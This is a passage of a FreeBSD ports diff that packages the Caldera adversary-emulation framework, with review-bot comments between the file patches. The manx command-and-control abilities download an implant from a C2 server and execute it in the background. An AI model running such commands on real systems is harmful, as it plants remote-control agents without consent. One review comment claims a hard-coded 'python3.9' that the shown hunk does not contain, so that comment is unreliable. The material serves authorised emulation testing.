+                 baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' +
+                     ' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' +
+@@ -293,6 +299,10 @@
+         $.each(extra, function(i, command) {
+             switch (platform) {
+                 case "darwin":
++                    command = command.replace(/\\/g, '\\\\');
++                    command = command.replace(/"/g, '\\\"');
++                    break;
++                case "freebsd":
+                     command = command.replace(/\\/g, '\\\\');
+                     command = command.replace(/"/g, '\\\"');
+                     break;
+@@ -317,4 +327,4 @@
+         return provided_value || default_value;
+     }
+ 
+-</script>
+\ No newline at end of file
++</script>
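Review bot: the new "freebsd" case in the second hunk hard-codes `virtualenv -p python3.9`, while the neighbouring cases use `python3` and the port's Makefile declares `USES= go:run python:3.8+`. This command runs on the target host, which may not have 3.9 installed, so it will stop working as soon as the default Python moves. If `python3` is acceptable on FreeBSD targets, the case could share the linux branch (`case "freebsd": case "linux":`) instead of duplicating three long lines; otherwise the version requirement should be documented. The added `break;` line also carries trailing whitespace.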
diff --git a/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml b/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml
new file mode 100644
index 000000000000..a641bf2abe45
--- /dev/null
+++ b/security/caldera/files/patch-plugins_manx_data_abilities_command-and-control_356d1722-7784-40c4-822b-0cf864b0b36d.yml
@@ -0,0 +1,33 @@
+--- plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml.orig	2022-08-08 23:34:48 UTC
++++ plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml
+@@ -57,6 +57,30 @@
+               contact="tcp";
+               agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
+               nohup ./$agent -http $server -socket $socket -contact $contact &
++    freebsd:
++      sh:
++        command: |
++          server="#{app.contact.http}";
++          socket="#{app.contact.tcp}";
++          contact="tcp";
++          curl -s -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name};
++          chmod +x #{agents.implant_name};
++          ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v
++        variations:
++          - description: Run against the UDP contact
++            command: |
++              server="#{app.contact.http}";
++              socket="#{app.contact.udp}";
++              contact="udp";
++              agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
++              nohup ./$agent -http $server -socket $socket -contact $contact &
++          - description: Download with a random name and start as a background process
++            command: |
++              server="#{app.contact.http}";
++              socket="#{app.contact.tcp}";
++              contact="tcp";
++              agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
++              nohup ./$agent -http $server -socket $socket -contact $contact &
+     windows:
+       psh:
+         command: |
diff --git a/security/caldera/files/patch-plugins_manx_update-shells.sh b/security/caldera/files/patch-plugins_manx_update-shells.sh
new file mode 100644
index 000000000000..97280531ab7d
--- /dev/null
+++ b/security/caldera/files/patch-plugins_manx_update-shells.sh
@@ -0,0 +1,12 @@
+--- plugins/manx/update-shells.sh.orig	2022-08-08 23:34:48 UTC
++++ plugins/manx/update-shells.sh
+@@ -1,7 +1,8 @@
+-#!/bin/bash
++#!/bin/sh
+ cwd=$(pwd)
+ cd shells
+ GOOS=windows go build -o ../payloads/manx.go-windows -ldflags="-s -w" manx.go
+ GOOS=linux go build -o ../payloads/manx.go-linux -ldflags="-s -w" manx.go
+ GOOS=darwin go build -o ../payloads/manx.go-darwin -ldflags="-s -w" manx.go
++GOOS=freebsd go build -o ../payloads/manx.go-freebsd -ldflags="-s -w" manx.go
+ cd $cwd
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml b/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml
new file mode 100644
index 000000000000..4df13e956c00
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_command-and-control_1837b43e-4fff-46b2-a604-a602f7540469.yml
@@ -0,0 +1,15 @@
+--- plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml
+@@ -24,3 +24,12 @@
+           python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60
+         cleanup: |
+           pkill -f elasticat
++    freebsd:
++      sh:
++        command: |
++          server="#{app.contact.http}";
++          curl -s -X POST -H "file:elasticat.py" -H "platform:freebsd" $server/file/download > elasticat.py;
++          pip install requests;
++          python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60
++        cleanup: |
++          pkill -f elasticat
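Review bot: the added freebsd executor calls unversioned `pip` and `python`, whereas the human.html patch in this same commit names `python3.9` explicitly for FreeBSD; the two should agree on which interpreter name an agent host is expected to provide. `pip install requests` also pulls an unpinned package from the network into the agent host's environment each time the ability runs, and the cleanup step only does `pkill -f elasticat`, leaving the downloaded elasticat.py and the installed package behind. Consider documenting requests as a prerequisite on the agent host and removing elasticat.py in cleanup.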
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml
new file mode 100644
index 000000000000..e34453b7e11c
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml
@@ -0,0 +1,11 @@
+--- plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml
+@@ -9,7 +9,7 @@
+     name: x
+   repeatable: True
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           find /var/mail -type f -exec grep "From.*@.*\..*" {} \; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml
new file mode 100644
index 000000000000..2962be97e40c
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_3b4640bc-eacb-407a-a997-105e39788781.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml
+@@ -17,7 +17,7 @@
+             - source: remote.port.unauthorized
+               edge: has_pid
+               target: host.pid.unauthorized
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}'
+@@ -34,4 +34,4 @@
+           plugins.response.app.parsers.process:
+             - source: remote.port.unauthorized
+               edge: has_pid
+-              target: host.pid.unauthorized
+\ No newline at end of file
++              target: host.pid.unauthorized
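Review bot: `ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}'` is enabled for FreeBSD as is, but it is a substring match over the whole process listing, so a port value also matches PIDs, memory sizes, times and unrelated arguments containing the same digits, and `ps` does not list sockets at all. On FreeBSD, `sockstat -p` with the port maps a port to its owning PID directly; a separate `freebsd:` block using it would give `host.pid.unauthorized` a reliable value. The fact is also interpolated unquoted into the pipeline.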
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml
new file mode 100644
index 000000000000..5c45a62b261e
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_930236c2-5397-4868-8c7b-72e294a5a376.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml
+@@ -7,7 +7,7 @@
+     name: x
+   repeatable: True
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           filepath="#{file.sensitive.path}";
+@@ -46,4 +46,4 @@
+         edge: has_hash
+         target: file.sensitive.hash
+     - plugins.stockpile.app.requirements.paw_provenance:
+-        - source: file.sensitive.hash
+\ No newline at end of file
++        - source: file.sensitive.hash
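Review bot: The second inner hunk (`@@ -46,4 +46,4 @@`) changes nothing except adding the missing newline at end of file, which is editor noise and not part of the FreeBSD enablement. It makes this local patch touch more of the upstream file than the one-line `freebsd,linux:` change needs, so it is more likely to stop applying on the next update; regenerate the patch without it. The same newline-only hunk recurs in several other ability patches in this commit.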
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml
new file mode 100644
index 000000000000..bb5c268f119d
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_9bc10f37-0853-4d73-b547-019c11eda22f.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml
+@@ -7,7 +7,7 @@
+     name: x
+   repeatable: True
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           directory="#{directory.sensitive.path}";
+@@ -68,4 +68,4 @@
+           edge: has_hash
+           target: directory.sensitive.hash
+     - plugins.stockpile.app.requirements.paw_provenance:
+-        - source: directory.sensitive.hash
+\ No newline at end of file
++        - source: directory.sensitive.hash
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml b/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml
new file mode 100644
index 000000000000..04e09ebbabbd
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_detection_ee54384f-cfbc-4228-9dc1-cc5632307afb.yml
@@ -0,0 +1,11 @@
+--- plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml
+@@ -8,7 +8,7 @@
+     name: x
+   repeatable: True
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           set -f;
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml
new file mode 100644
index 000000000000..9c0b12919fb9
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml
@@ -0,0 +1,11 @@
+--- plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml
+@@ -28,7 +28,7 @@
+             - source: host.process.guid
+               edge: has_interesting
+               target: investigate.process.guid
+-    linux:
++    freebsd,linux:
+       elasticsearch:
+         *cmd
+     darwin:
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml
new file mode 100644
index 000000000000..1fa277437813
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml
@@ -0,0 +1,11 @@
+--- plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml
+@@ -25,7 +25,7 @@
+             - source: host.process.guid
+               edge: has_interesting
+               target: investigate.process.parent_guid
+-    linux:
++    freebsd,linux:
+       elasticsearch:
+         *cmd
+     darwin:
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml
new file mode 100644
index 000000000000..2879ff2bff30
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml
@@ -0,0 +1,11 @@
+--- plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml
+@@ -22,7 +22,7 @@
+             - source: host.process.guid
+               edge: has_interesting
+               target: investigate.process.guid
+-    linux:
++    freebsd,linux:
+       elasticsearch:
+         *cmd
+     darwin:
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml
new file mode 100644
index 000000000000..85edefaa30f9
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml
+@@ -8,7 +8,7 @@
+     attack_id: x
+     name: x
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           kill -9 #{host.pid.unauthorized}
+@@ -25,4 +25,4 @@
+           taskkill /pid #{host.pid.unauthorized} /f
+   requirements:
+     - plugins.stockpile.app.requirements.paw_provenance:
+-      - source: host.pid.unauthorized
+\ No newline at end of file
++      - source: host.pid.unauthorized
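Review bot: `kill -9 #{host.pid.unauthorized}` becomes runnable on FreeBSD agents with the fact substituted unquoted and with no check that it is a single numeric PID. In this commit that fact is produced by the detection ability that greps `ps aux` for a port number, so a false match there ends in SIGKILL of an unrelated process here. A guard that the value is all digits and that the process still owns the port would make this response safe to automate; sending a plain `kill` before `-9` also gives the process a chance to exit cleanly.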
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml
new file mode 100644
index 000000000000..e28abe22f8d4
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml
+@@ -7,7 +7,7 @@
+     attack_id: x
+     name: x
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi;
+@@ -27,4 +27,4 @@
+           if (-not (Test-Path -Path .\hosts_backup)) { Copy-Item -Path c:\windows\system32\drivers\etc\hosts -Destination .\hosts_backup; };
+           Add-Content c:\windows\system32\drivers\etc\hosts "127.0.0.1`t#{remote.suspicious.url}";
+         cleanup: |
+-          Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force
+\ No newline at end of file
++          Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force
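Review bot: The sh command guards the backup with `if ! test -f hosts_backup`, so any file already named `hosts_backup` in the agent's working directory is kept as the backup, whether it is stale from an earlier run or was not written by the agent. The Windows cleanup visible in the second hunk moves that file back over the hosts file; if the sh cleanup does the same, old or foreign content ends up in `/etc/hosts`. Writing the backup to a path from `mktemp` in a directory only the agent can write, and removing it in cleanup, avoids this.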
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml
new file mode 100644
index 000000000000..26f61e8f83cd
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml
+@@ -7,7 +7,7 @@
+     attack_id: x
+     name: x
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           crontab -u #{host.user.name} -l > temp_crontab;
+@@ -35,4 +35,4 @@
+           edge: has_new_cronjob
+           target: host.new.cronjob
+     - plugins.stockpile.app.requirements.paw_provenance:
+-        - source: host.new.cronjob
+\ No newline at end of file
++        - source: host.new.cronjob
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml
new file mode 100644
index 000000000000..72c7f5fec0b7
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml
+@@ -7,7 +7,7 @@
+     name: x
+   repeatable: False
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           directory="#{directory.sensitive.path}";
+@@ -40,4 +40,4 @@
+     - plugins.stockpile.app.requirements.paw_provenance:
+         - source: directory.sensitive.backup
+     - plugins.stockpile.app.requirements.paw_provenance:
+-        - source: directory.sensitive.path
+\ No newline at end of file
++        - source: directory.sensitive.path
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml
new file mode 100644
index 000000000000..f87d3e750316
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml
+@@ -7,7 +7,7 @@
+     name: x
+   repeatable: False
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path}
+@@ -31,4 +31,4 @@
+     - plugins.stockpile.app.requirements.paw_provenance:
+         - source: file.backup.name
+     - plugins.stockpile.app.requirements.paw_provenance:
+-        - source: file.sensitive.path
+\ No newline at end of file
++        - source: file.sensitive.path
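Review bot: In `cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path}` both facts are substituted unquoted, so a path containing whitespace or glob characters is split or expanded by the shell and the copy can land on the wrong target. Quote both operands; the sibling detection ability in this commit already does so in its assignment `filepath="#{file.sensitive.path}";`.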
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml
new file mode 100644
index 000000000000..fb7e82cf61c0
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml
@@ -0,0 +1,11 @@
+--- plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml
+@@ -7,7 +7,7 @@
+     name: x
+   repeatable: False
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           mkdir -p /tmp/sensitive_file_backups;
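Review bot: `mkdir -p /tmp/sensitive_file_backups` uses a fixed name under world-writable `/tmp`, and `-p` succeeds silently when the path already exists, so the ability never learns whether the directory is its own or what its mode is. The restore ability in this commit later copies files from this directory over `#{file.sensitive.path}`, which makes the directory's ownership security-relevant on a multi-user FreeBSD host. Create it with `mkdir -m 700` without `-p` and fail if it exists, or keep the backups in a directory owned by the agent's user outside `/tmp`.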
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml
new file mode 100644
index 000000000000..fa5a362e9b9e
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml
+@@ -7,7 +7,7 @@
+     name: x
+   repeatable: False
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           output="";
+@@ -87,4 +87,4 @@
+           }
+   requirements:
+     - plugins.response.app.requirements.source_fact:
+-        - source: directory.sensitive.path
+\ No newline at end of file
++        - source: directory.sensitive.path
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml
new file mode 100644
index 000000000000..966f5dfa6125
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml
+@@ -7,7 +7,7 @@
+     name: x
+   repeatable: False
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           mkdir -p /tmp/sensitive_file_backups;
+@@ -67,4 +67,4 @@
+           Remove-Item -Recurse -Force C:\Users\Public\sensitive_file_backups;
+   requirements:
+     - plugins.response.app.requirements.source_fact:
+-      - source: file.sensitive.path
+\ No newline at end of file
++      - source: file.sensitive.path
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml
new file mode 100644
index 000000000000..fac4b766aaa3
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml
+@@ -7,7 +7,7 @@
+     name: x
+   repeatable: False
+   platforms:
+-    linux:
++    freebsd,linux:
+       sh:
+         command: |
+           mkdir -p /tmp/sensitive_file_backups;
+@@ -104,4 +104,4 @@
+               then rm -f $file;
+             fi;
+           done;
+-          rm -rf /tmp/sensitive_file_backups;
+\ No newline at end of file
++          rm -rf /tmp/sensitive_file_backups;
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml
new file mode 100644
index 000000000000..5d580c3b3239
--- /dev/null
+++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml
@@ -0,0 +1,18 @@
+--- plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml.orig	2021-10-13 20:41:40 UTC
++++ plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml
+@@ -7,7 +7,7 @@
*** 2939 LINES SKIPPED ***


